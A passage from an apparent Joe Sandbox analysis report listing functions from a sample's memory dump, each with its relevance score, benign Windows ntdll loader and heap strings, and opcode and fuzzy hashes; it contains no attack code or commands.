                                                  • Instruction Fuzzy Hash: FDA149719116299BDB319B68CC88BEAB7B8EF44B10F1041EAE90DE7250D735AF84CF51
                                                  Function 01890BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 018DA121
                                                  • Failed to allocated memory for shimmed module list, xrefs: 018DA10F
                                                  • LdrpCheckModule, xrefs: 018DA117
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-161242083
                                                  • Opcode ID: 893375111df0f5bb1f71fc2726f29a4ae42d244d6c06c57dd91eecf0e4e8c1bb
                                                  • Instruction ID: 426f2f29ebd57b99ac15d132eec674d0119334695cfbae7292f5a249d5adc6a6
                                                  • Opcode Fuzzy Hash: 893375111df0f5bb1f71fc2726f29a4ae42d244d6c06c57dd91eecf0e4e8c1bb
                                                  • Instruction Fuzzy Hash: 84718B71A00205DFDF29DF6DC981AAEB7B8EB44708F18406DE906E7251E634AF41CB51
                                                  Function 01880A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-1334570610
                                                  • Opcode ID: 3dea91a5444f10bff8b8cf97e7f348af49546339ff399d713af8178319fd946f
                                                  • Instruction ID: 1662eb585956ff406ac0e6f4699cdbd04f0ec6dbed7456cfb47945a5626dbe96
                                                  • Opcode Fuzzy Hash: 3dea91a5444f10bff8b8cf97e7f348af49546339ff399d713af8178319fd946f
                                                  • Instruction Fuzzy Hash: A061AD706003059FDB29DF28C484B6ABBF1FF45708F14856AE499CB292DB70EA85CB91
                                                  Function 018AC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 018E82E8
                                                  • Failed to reallocate the system dirs string !, xrefs: 018E82D7
                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 018E82DE
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-1783798831
                                                  • Opcode ID: cb8dff2e30b5ce340c84328ed1950163e80efc6bb9f27fe7a54893ea08d2a439
                                                  • Instruction ID: 9f3b7ef9bcf93c15bd796e6181cfcc4410f10bb2498e7ab4c50466f06ae6b4ab
                                                  • Opcode Fuzzy Hash: cb8dff2e30b5ce340c84328ed1950163e80efc6bb9f27fe7a54893ea08d2a439
                                                  • Instruction Fuzzy Hash: 294124B1548305ABD721EB6CD944B5B7BE8EF45750F00482EF948D3264EB70DA00CBA2
                                                  Function 0192C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • @, xrefs: 0192C1F1
                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0192C1C5
                                                  • PreferredUILanguages, xrefs: 0192C212
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                  • API String ID: 0-2968386058
                                                  • Opcode ID: 7a336538b85c6c1de041692fc6105bd4bfdefdf135d64089b5f8f933d85a37e3
                                                  • Instruction ID: 10d144567e9b80bef9b82cc0f358e0e370e467a2806f1b82a2b4332228771cc4
                                                  • Opcode Fuzzy Hash: 7a336538b85c6c1de041692fc6105bd4bfdefdf135d64089b5f8f933d85a37e3
                                                  • Instruction Fuzzy Hash: 9F416271E00219EBDF11DAD8C881FEEBBBDAB15701F14416AEA09F7244DB74DA44CB91
                                                  Function 01904144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                  • API String ID: 0-1373925480
                                                  • Opcode ID: fa26d1eb2348d0f3746a8164efaab84b4de8ded639d9351ef88b443d61c639f6
                                                  • Instruction ID: da49f4eb0e40ccdc10fc2b16c19e9a35787f2acd115b0273c2c09c10c611e941
                                                  • Opcode Fuzzy Hash: fa26d1eb2348d0f3746a8164efaab84b4de8ded639d9351ef88b443d61c639f6
                                                  • Instruction Fuzzy Hash: F241F332A042498FEB26DBADC840BADBBF9FF65740F140459DA05EB7D1D7349A01CB52
                                                  Function 018F4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 018F4888
                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 018F4899
                                                  • LdrpCheckRedirection, xrefs: 018F488F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 0-3154609507
                                                  • Opcode ID: d29aa403fef08e41a0af02366b5e890966d82e5d1c73471b10774b73ba9a901d
                                                  • Instruction ID: a7e183d21d72b58e3768dfad412d6d37efa348e3cd8bfc454a15653238007264
                                                  • Opcode Fuzzy Hash: d29aa403fef08e41a0af02366b5e890966d82e5d1c73471b10774b73ba9a901d
                                                  • Instruction Fuzzy Hash: 9F41AF32A147559FCB21CE6DD840A27BBE4AF89B50F05056EEE48D7325D731EA10CB91
                                                  Function 01880BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-2558761708
                                                  • Opcode ID: 4ad3215ae473e6c9c432e0bffbd8b029eb1e9385d6411e44f63a7666a07865c9
                                                  • Instruction ID: 0cabfa00504f23839d4d0b784b22a7aeb578a8010fda798b42b3f0c694bf4e93
                                                  • Opcode Fuzzy Hash: 4ad3215ae473e6c9c432e0bffbd8b029eb1e9385d6411e44f63a7666a07865c9
                                                  • Instruction Fuzzy Hash: B31106713152459FD719EA18C480F7AB7B5EF40729F18812EF406CB351DB34DA45C752
                                                  Function 018F20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 018F2104
                                                  • Process initialization failed with status 0x%08lx, xrefs: 018F20F3
                                                  • LdrpInitializationFailure, xrefs: 018F20FA
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-2986994758
                                                  • Opcode ID: 6d96f03239a310459d1d11140bd0b8c2560a2548013fc717046c71ba1f4ec158
                                                  • Instruction ID: 24c440976e235d038475120e3c4bfda0edf68e12eee3083aa739c4a209f12ce8
                                                  • Opcode Fuzzy Hash: 6d96f03239a310459d1d11140bd0b8c2560a2548013fc717046c71ba1f4ec158
                                                  • Instruction Fuzzy Hash: 9DF0AF75640708ABE724E64C8C96F993B6AEB41B54F10005DFB04E7386D6A4AB408695
                                                  Function 018803E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: #%u
                                                  • API String ID: 48624451-232158463
                                                  • Opcode ID: a139609d962b731fe20dbeeaeb54d2cda0579ba43eeaf857bd1ca4add99a73bb
                                                  • Instruction ID: 04500797d80e6dcc41caa70c903035fdc2ae737a367ed4dcf265ede4547e97f5
                                                  • Opcode Fuzzy Hash: a139609d962b731fe20dbeeaeb54d2cda0579ba43eeaf857bd1ca4add99a73bb
                                                  • Instruction Fuzzy Hash: 00712A71A0124A9FDB01DFACC990BAEB7F8FF58704F154069E905E7251EB34EA05CB61
                                                  Function 0187A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • LdrResSearchResource Exit, xrefs: 0187AA25
                                                  • LdrResSearchResource Enter, xrefs: 0187AA13
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                  • API String ID: 0-4066393604
                                                  • Opcode ID: 2f1fcd1f80f033455566895b83f11ced9c3a0c548b8c599e836a903ffb78efe1
                                                  • Instruction ID: 51ffb42aad485bd116b143a94617aacf6c7d96547cdd0a8fc1f2ab5910c550c8
                                                  • Opcode Fuzzy Hash: 2f1fcd1f80f033455566895b83f11ced9c3a0c548b8c599e836a903ffb78efe1
                                                  • Instruction Fuzzy Hash: A2E17E71E04319AFEF26DE9CC980BAEBBBABF54314F184426E901E7251D774DA40CB51
                                                  Function 0193A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `$`
                                                  • API String ID: 0-197956300
                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                  • Instruction ID: 853b123b22f8c32b010bdd084fef39923312b869f606e5a44045c678de433bbc
                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                  • Instruction Fuzzy Hash: 91C1D2312043469BE725CF28C844B6BBBE9AFD4719F084A2CF6DACB290D775D505CB42
                                                  Function 018EE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Legacy$UEFI
                                                  • API String ID: 2994545307-634100481
                                                  • Opcode ID: 7701b6ac8ece2ac5cd7732c478566024d9b6f74b2d3ca39a4a0b405b3134f929
                                                  • Instruction ID: 26b681a097608a96a9c9bad029aaf37549a91172e38ae96392cfeb674142cdc2
                                                  • Opcode Fuzzy Hash: 7701b6ac8ece2ac5cd7732c478566024d9b6f74b2d3ca39a4a0b405b3134f929
                                                  • Instruction Fuzzy Hash: C1615C71E402199FDB25DFA8C884BAEBBF9FB45704F14406DE659EB251DB31EA00CB50
                                                  Function 019143D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$MUI
                                                  • API String ID: 0-17815947
                                                  • Opcode ID: cd9712c08cea28902bced1e113cb64e9be951912535d298f9cf51154ea31fc23
                                                  • Instruction ID: c3024c69bd63ed993580a1b30a91ce8ea6a7b657a862ba1fc93b31c07dbb8bc2
                                                  • Opcode Fuzzy Hash: cd9712c08cea28902bced1e113cb64e9be951912535d298f9cf51154ea31fc23
                                                  • Instruction Fuzzy Hash: 9B511871E4021EAEDF11DFA9CC80AEEBBBDEB48754F100529E615E7294D7309A45CB60
                                                  Function 018704E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • kLsE, xrefs: 01870540
                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0187063D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                  • API String ID: 0-2547482624
                                                  • Opcode ID: 81fd091791378d60cbbbcc6c909b2763ce1dcf29927480efde874ed274126548
                                                  • Instruction ID: 75216d9ab78e07507764a2ea41b71d7d7da7d27bf7540ce3829df456a4b6ab7a
                                                  • Opcode Fuzzy Hash: 81fd091791378d60cbbbcc6c909b2763ce1dcf29927480efde874ed274126548
                                                  • Instruction Fuzzy Hash: 5B51CF715047468FD724DF68C4806A7BBE4AF86304F10483EFAEAC7241E770E645CB92
                                                  Function 0187A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 0187A2FB
                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 0187A309
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                  • API String ID: 0-2876891731
                                                  • Opcode ID: 3af68bf86c55d7ce22ca5ec87162252aa95205d60e8efb6303f48dca358e866f
                                                  • Instruction ID: 2989e26d40ab2cbc64275eac65fd5f976d2f022bdef9c9abe5a0bf35897dd7e2
                                                  • Opcode Fuzzy Hash: 3af68bf86c55d7ce22ca5ec87162252aa95205d60e8efb6303f48dca358e866f
                                                  • Instruction Fuzzy Hash: D941A931A04749CBDB29DF69C840B6EBBB5FF85704F2840A9EA00DB291E6B5DB00CB41
                                                  Function 018AA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Cleanup Group$Threadpool!
                                                  • API String ID: 2994545307-4008356553
                                                  • Opcode ID: adb416bfcf963aefe653e89b2fdb84d63b615e26a3d092338166db1ca6bed9d9
                                                  • Instruction ID: d019d15acf4050dd37bc04988be5f4054e1c746a3c8c085dd8e6172aecd7460b
                                                  • Opcode Fuzzy Hash: adb416bfcf963aefe653e89b2fdb84d63b615e26a3d092338166db1ca6bed9d9
                                                  • Instruction Fuzzy Hash: 8701D1B2244704AFE311DF14DE45B16BBE8E794B15F048939A648C7690E774EA04CB46
                                                  Function 0187C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: MUI
                                                  • API String ID: 0-1339004836
                                                  • Opcode ID: 341dc3d65e86d8245b395f8ca67430a54fb654db346e3dc969ddbc5a7cb1eb71
                                                  • Instruction ID: 419c4ac4b85e53b9dee0edc757e6f7fff4f90619041388727e6fa4d843eee04e
                                                  • Opcode Fuzzy Hash: 341dc3d65e86d8245b395f8ca67430a54fb654db346e3dc969ddbc5a7cb1eb71
                                                  • Instruction Fuzzy Hash: 92825B75E002199FEB25CFA9C880BEDBBB1BF48314F148169E959EB351D730EA81CB50
                                                  Function 018F6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: e91c79f37c4b039f23ad08205e2e3eb82ba8003164f842d163b3ab228b630520
                                                  • Instruction ID: 30ae56e22f96653cb66c76c9e26048cbd5ebf8b051d06f056a4c1649d806e3e1
                                                  • Opcode Fuzzy Hash: e91c79f37c4b039f23ad08205e2e3eb82ba8003164f842d163b3ab228b630520
                                                  • Instruction Fuzzy Hash: 7E917371A00219AFDB21DB99CD85FAE7BB9EF19B50F240169F700FB191E674AA00CB51
                                                  Function 0191E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: fb316c1e9f0c72d9f2fa296023eac968c43edc9e9fc14044aa875f1d7f2f4323
                                                  • Instruction ID: e6d3620309cbe2f71d4be47cb2a18ef3626786fca01ef84ac4732eb0b842293c
                                                  • Opcode Fuzzy Hash: fb316c1e9f0c72d9f2fa296023eac968c43edc9e9fc14044aa875f1d7f2f4323
                                                  • Instruction Fuzzy Hash: 95919D3190060EABDB27EBA9DC54FEFBBB9EF45740F100429F909A7254D7349A42CB91
                                                  Function 018AA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GlobalTags
                                                  • API String ID: 0-1106856819
                                                  • Opcode ID: ae1f97c1fae15a28a4755b391b75cb59730a90c81e29bdfe5b1bd6c11a00f699
                                                  • Instruction ID: c55518a5e55a9be10e9e436f1b168542839f1678973b8eb98123cda2ca427951
                                                  • Opcode Fuzzy Hash: ae1f97c1fae15a28a4755b391b75cb59730a90c81e29bdfe5b1bd6c11a00f699
                                                  • Instruction Fuzzy Hash: 77715CB5E0021ADFDF28CF9CC9946ADBBF1BF69714F24812AE905E7241E7309A41CB50
                                                  Function 01914978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .mui
                                                  • API String ID: 0-1199573805
                                                  • Opcode ID: d66f9a29048145f705c7eac1144c57637d1499ea2d89be9b9c18bf01b804c40a
                                                  • Instruction ID: 474a5ef3b5b11d5b23caacb6b7394fb288876c5d06f6cd3f75f792e6df9d689a
                                                  • Opcode Fuzzy Hash: d66f9a29048145f705c7eac1144c57637d1499ea2d89be9b9c18bf01b804c40a
                                                  • Instruction Fuzzy Hash: 8C519172D0022E9BDF11DF99D840AAEBBB9BF18B10F054129EA19FB244D7349941CBA4
                                                  Function 0188E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: EXT-
                                                  • API String ID: 0-1948896318
                                                  • Opcode ID: 78167d1a1a578539b04725a250143575d310ffecfc695eacddec20991deb5c4f
                                                  • Instruction ID: ef70efe14d7d6af1afccb7f77c201093ff6704b196643699033b1bd7d4b08b6d
                                                  • Opcode Fuzzy Hash: 78167d1a1a578539b04725a250143575d310ffecfc695eacddec20991deb5c4f
                                                  • Instruction Fuzzy Hash: 6A4181725083169BD721FA79C880B6BB7D8AF88B18F04092DF994E7140E674DB04C797
                                                  Function 018EC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BinaryHash
                                                  • API String ID: 0-2202222882
                                                  • Opcode ID: 286e595a156aebb27abbb1424ab5b6c63852a63706a4fb42c82fb43ac710798a
                                                  • Instruction ID: 2e070d7566d437358c482374f3b24515d54b84c325832b48a14a31e519be606f
                                                  • Opcode Fuzzy Hash: 286e595a156aebb27abbb1424ab5b6c63852a63706a4fb42c82fb43ac710798a
                                                  • Instruction Fuzzy Hash: 724151B1D0012DABDB21DA54CD84FDEB7BCAB45714F0045A5EB08EB241DB709F898FA5
                                                  Function 01906B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #
                                                  • API String ID: 0-1885708031
                                                  • Opcode ID: 25e4498ddb43ca6dbb4dadf5f28a03725012849218420bfac2bdb99e868a895e
                                                  • Instruction ID: 628f871ee7a52be775f98c7dccdc11cfcd0b0228d6272e6916ac88ce2fd3db2a
                                                  • Opcode Fuzzy Hash: 25e4498ddb43ca6dbb4dadf5f28a03725012849218420bfac2bdb99e868a895e
                                                  • Instruction Fuzzy Hash: 9031F231E0062A9EEB23DB6DC850BAA7BB8DF05704F144028EA49EB2C2DB75D955CB50
                                                  Function 018F892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 018F895E
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                  • API String ID: 0-702105204
                                                  • Opcode ID: 1912e5a55f94b99696512b8f1822e4838a27bc563c1ffd46beb30b8ce9567d80
                                                  • Instruction ID: e06ba5dcebf3831f5a843bd0c7c4ce057975a96fbb7ea55a3d307eb84e50178f
                                                  • Opcode Fuzzy Hash: 1912e5a55f94b99696512b8f1822e4838a27bc563c1ffd46beb30b8ce9567d80
                                                  • Instruction Fuzzy Hash: C40126323042019FE7206B5ACC84B5A7B69EFD3398B05102CF741C6161CF20AE81C7A3
                                                  Function 01912000 Relevance: .8, Instructions: 757COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 952fdbbec88ec3c3018b37fd2731c194c4d0f0f42e97e6a9f2e5c561f403d47f
                                                  • Instruction ID: 737a6d5ed9dd558f195f06e8591dcf43bf377ee19c0afd2bb10a97069ddeb46b
                                                  • Opcode Fuzzy Hash: 952fdbbec88ec3c3018b37fd2731c194c4d0f0f42e97e6a9f2e5c561f403d47f
                                                  • Instruction Fuzzy Hash: 9542E9316083499FD715EF68C890A6FBBE9BF84700F28092DFA8AD7254D770D985CB52
                                                  Function 01908158 Relevance: .6, Instructions: 617COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d29c7b32c6030a948e6868ec2c47cd9ee67c95ffdc638d50582a61927ed4eb32
                                                  • Instruction ID: d43ff364a0932e2b7dabc8f77ff2a6f8f350904a060d80a08318ac6a76f3b0d9
                                                  • Opcode Fuzzy Hash: d29c7b32c6030a948e6868ec2c47cd9ee67c95ffdc638d50582a61927ed4eb32
                                                  • Instruction Fuzzy Hash: 45426F75E002199FEB25CF69C881BADBBF5BF88311F198099E94DEB281D7349981CF50
                                                  Function 01882840 Relevance: .6, Instructions: 605COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b5b76e87bbc1e90c968e8eea8c06e10241b886ca30ac2f3a4aa296332027fc73
                                                  • Instruction ID: dc15f65a5be93cab2781d938fb000240ba783508a4bca0b130423a9e9274acd5
